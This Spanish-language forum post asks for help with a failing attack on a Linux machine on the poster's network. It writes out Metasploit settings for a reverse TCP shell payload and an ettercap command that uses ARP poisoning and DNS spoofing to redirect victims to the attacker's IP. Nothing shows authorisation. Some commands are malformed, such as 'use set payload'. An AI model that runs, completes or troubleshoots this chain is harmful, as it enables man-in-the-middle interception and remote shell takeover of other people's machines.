hola,
estoy utilizando backtrack5r3 x64 para tratar de obtener una shell de un equipo (linux-x86) de mi red, creo el exploit y utilizo ettercap para un redireccionamiento a la ip venenosa, pero no funciona, no se que pueda ser, ya modifique el archivo etter.dns, todo parece estar bien, no se que sea. aqui escribo mi codigo:
+++en una consola+++
msfconsole
use set payload linux/x86/shell/reverse_tcp
set srvhost mi-ip-privada
set srvport 4444
set uripath /
set lhost mi-ip-privada
set lport 23
exploit
#el exploit funciona aparentemente
+++en otra consola++++
ettercap -T -q -P dns_spoof -M arp // // -i wlan0
#redirecciona correctamente cualquier pagina a mi ip
aparantemente todo deberia funcionar, aunque se que estoy haciendo algo mal, por eso recurro a uds, cualquier aporte ayuda, de antemano muchas gracias.